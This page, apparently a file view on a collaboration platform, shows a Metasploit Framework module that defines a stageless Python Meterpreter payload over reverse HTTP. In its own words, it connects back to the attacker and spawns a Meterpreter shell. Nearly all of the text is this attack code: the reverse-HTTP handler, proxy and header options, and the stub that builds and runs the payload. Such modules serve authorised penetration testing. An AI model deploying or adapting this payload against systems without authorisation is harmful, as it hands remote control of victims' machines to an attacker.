Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = :dynamic
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Python
13
  include Msf::Payload::Python::ReverseHttp
14
  include Msf::Payload::Python::MeterpreterLoader
15

16
  def initialize(info = {})
17
    super(merge_info(info,
18
      'Name'        => 'Python Meterpreter Shell, Reverse HTTP Inline',
19
      'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',
20
      'Author'      => 'Spencer McIntyre',
21
      'License'     => MSF_LICENSE,
22
      'Platform'    => 'python',
23
      'Arch'        => ARCH_PYTHON,
24
      'Handler'     => Msf::Handler::ReverseHttp,
25
      'Session'     => Msf::Sessions::Meterpreter_Python_Python
26
    ))
27

28
    register_advanced_options(
29
      Msf::Opt::http_header_options +
30
      Msf::Opt::http_proxy_options
31
    )
32
  end
33

34
  def generate_reverse_http(opts={})
35
    opts[:uri_uuid_mode] = :init_connect
36
    met = stage_meterpreter({
37
      url:             generate_callback_url(opts),
38
      http_user_agent: opts[:user_agent],
39
      http_proxy_host: opts[:proxy_host],
40
      http_proxy_port: opts[:proxy_port],
41
      stageless:       true
42
    })
43

44
    py_create_exec_stub(met)
45
  end
46
end
47

48